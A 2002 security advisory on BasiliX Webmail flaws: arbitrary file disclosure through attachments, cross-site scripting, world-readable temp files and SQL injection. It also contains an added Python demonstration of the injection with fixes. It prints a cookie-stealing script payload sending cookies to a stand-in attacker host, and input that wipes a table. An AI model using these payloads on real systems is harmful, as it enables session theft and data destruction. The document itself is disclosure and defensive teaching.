
BasiliX Webmail multiple vulnerabilities
20th Jun 2002 [SBWID-5472]
COMMAND

	BasiliX multiple vulnerabilities

SYSTEMS AFFECTED

	BasiliX 1.1.0 and all previous versions

PROBLEM

	Ulf Harnhammar [ulfh@update.uu.se] says:

	In BasiliX WebMail software:

	1) The attachment capability in Compose Mail can be fooled into
	treating any file on the web server as the uploaded file. This means
	that it is easy to steal sensitive information on that server (like the
	/etc/passwd file), and mail it off to someone.

	When uploading files, PHP sets some global variables, one of which
	gives the temporary location where the uploaded file was stored. PHP
	usually also sets global variables with GET or POST form data. BasiliX
	doesn't check if the attachment really was uploaded by the user, or if
	it just was some POST data with the same format.

	This issue can be fixed by using the is_uploaded_file() function, to
	see if a file was in fact uploaded.

	2) The program has got some cross-site scripting issues. In mail
	folders, in Find Mail and when you read a message, the Subject mail
	header is shown without removing any HTML tags. When a message is read,
	the mail body is also shown without removing any HTML tags. This means
	that an attacker can include JavaScript code in an e-mail message, and
	that it will be executed in the user's browser when he or she looks at
	that message.

	This can be used for stealing a user's cookies, to allow the attacker
	to take over the user's session, by including JavaScript code like
	this:

	<script>self.location.href="http://evilhost.com/evil?"+escape(document.cookie)</script>

	It can also be used as a form of Denial of Service attack. If there is
	a message in your inbox folder that immediately redirects your browser
	to Slashdot as soon as you enter that folder, it gets rather hard to
	read your e-mail.

	This can be fixed by always using the htmlspecialchars() function when
	printing variables that shouldn't contain HTML tags.

	3) The attached files are saved in /tmp/BasiliX. They are readable by
	all users, and it seems like they never get deleted. This means that
	anyone who has got shell access to the server, or who can upload web
	scripts to it, can read all files any user has ever attached to an
	e-mail.

	4) BasiliX has got some SQL Injection holes. If you have an SQL
	statement where data from outside is not placed in apostrophes or
	quotes, like this:

	DELETE FROM table WHERE id=$id

	you can wipe all rows in the table by giving $id the value "id". This
	will execute the statement:

	DELETE FROM table WHERE id=id

	The way to fix this is to put all outside data in apostrophes or
	quotes, like this:

	DELETE FROM table WHERE id='$id'

	or to use PHP's is_numeric() function.
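
The SQL injection in item 4, replayed against a throwaway SQLite table as an added example (Python rather than BasiliX's PHP so it runs stand-alone; the table, rows and function names are constructed and none of this is from the advisory or the BasiliX code): the unquoted statement wipes every row when $id is the string "id", while the two fixes the advisory names, quoting and a numeric check, do not. A parameterised query is included as well, since that is the approach to prefer over hand-quoting today.

```python
import sqlite3

# Constructed sample data standing in for a BasiliX table keyed by id.
ROWS = [(1, "alice"), (2, "bob"), (3, "carol")]


def fresh_db():
    """Create an in-memory table with the three sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE mailfolder (id INTEGER, name TEXT)")
    db.executemany("INSERT INTO mailfolder VALUES (?, ?)", ROWS)
    return db


def remaining(db):
    return db.execute("SELECT COUNT(*) FROM mailfolder").fetchone()[0]


def delete_unquoted(user_id):
    """Vulnerable pattern from the advisory: DELETE FROM table WHERE id=$id.
    Input "id" yields WHERE id=id, which is true for every row."""
    db = fresh_db()
    db.execute(f"DELETE FROM mailfolder WHERE id={user_id}")
    return remaining(db)


def delete_quoted(user_id):
    """Advisory fix 1: DELETE FROM table WHERE id='$id'. Now "id" is a string
    literal that matches no integer id. (Quoting only holds up if quote
    characters inside the input are escaped as well, so see the variants below.)"""
    db = fresh_db()
    db.execute(f"DELETE FROM mailfolder WHERE id='{user_id}'")
    return remaining(db)


def delete_checked(user_id):
    """Advisory fix 2: reject non-numeric input up front (PHP's is_numeric()
    role is played by str.isdigit() here). Returns None when the input is refused."""
    if not user_id.isdigit():
        return None
    db = fresh_db()
    db.execute(f"DELETE FROM mailfolder WHERE id={int(user_id)}")
    return remaining(db)


def delete_parameterised(user_id):
    """Preferred approach: the value is bound, never spliced into the statement."""
    db = fresh_db()
    db.execute("DELETE FROM mailfolder WHERE id=?", (user_id,))
    return remaining(db)
```

Each function returns how many of the three rows survive, so 0 after `delete_unquoted("id")` is the wipe the advisory describes.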

SOLUTION

	None yet.
	

	Check : http://basilix.org/
